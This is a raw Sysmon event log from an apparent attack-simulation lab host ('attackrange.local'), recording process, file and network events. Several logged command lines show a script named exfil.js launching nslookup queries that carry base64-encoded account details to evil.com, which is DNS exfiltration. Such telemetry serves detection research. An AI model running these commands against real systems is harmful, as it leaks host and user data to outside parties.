14:21:30.711{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7E43-000000005F02}6224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.711{2E1864BB-18E0-629A-6742-000000005F02}39767736C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-7E43-000000005F02}6224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.720{2E1864BB-18EA-629A-7E43-000000005F02}6224C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlddvt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.711{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsgicbd.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000208626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50639- 354300x8000000000000000208625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-50639-false127.0.0.1-53domain 354300x8000000000000000208624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.115{00000000-0000-0000-0000-000000000000}7792<unknown process>-udpfalsefalse127.0.0.1-50638-false127.0.0.1-53domain 354300x8000000000000000208623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.115{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50638- 354300x8000000000000000208622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.115{00000000-0000-0000-0000-000000000000}7792<unknown process>-udptruefalse127.0.0.1-50638-false127.0.0.1-53domain 354300x8000000000000000208621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.114{00000000-0000-0000-0000-000000000000}7792<unknown process>-udpfalsefalse127.0.0.1-50637-false127.0.0.1-53domain 354300x8000000000000000208620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.114{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50637- 354300x8000000000000000208619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.114{00000000-0000-0000-0000-000000000000}7792<unknown process>-udptruefalse127.0.0.1-50637-false127.0.0.1-53domain 354300x8000000000000000208618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.114{00000000-0000-0000-0000-000000000000}7792<unknown process>-udpfalsefalse127.0.0.1-50636-false127.0.0.1-53domain 354300x8000000000000000208617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.114{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50636- 354300x8000000000000000208616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.114{00000000-0000-0000-0000-000000000000}7792<unknown process>-udptruefalse127.0.0.1-50636-false127.0.0.1-53domain 10341000x8000000000000000208615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.680{2E1864BB-18EA-629A-7C43-000000005F02}36206336C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7D43-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.679{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.679{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.679{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.679{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.679{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7D43-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.678{2E1864BB-18EA-629A-7B43-000000005F02}59324556C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-7D43-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.678{2E1864BB-18EA-629A-7D43-000000005F02}6324C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-7B43-000000005F02}5932C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsgicbd.tmp 2>&1 10341000x8000000000000000208607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.643{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7C43-000000005F02}3620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.643{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7C43-000000005F02}3620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.643{2E1864BB-18EA-629A-7C43-000000005F02}36206336C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7B43-000000005F02}5932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.627{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7C43-000000005F02}3620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.611{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.611{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.611{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.611{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.611{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7B43-000000005F02}5932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.611{2E1864BB-18E0-629A-6742-000000005F02}39764708C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-7B43-000000005F02}5932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.622{2E1864BB-18EA-629A-7B43-000000005F02}5932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsgicbd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000208596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.611{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.596{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000208594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.596{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nleuwi.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.580{2E1864BB-18EA-629A-7943-000000005F02}55967644C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7A43-000000005F02}884C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 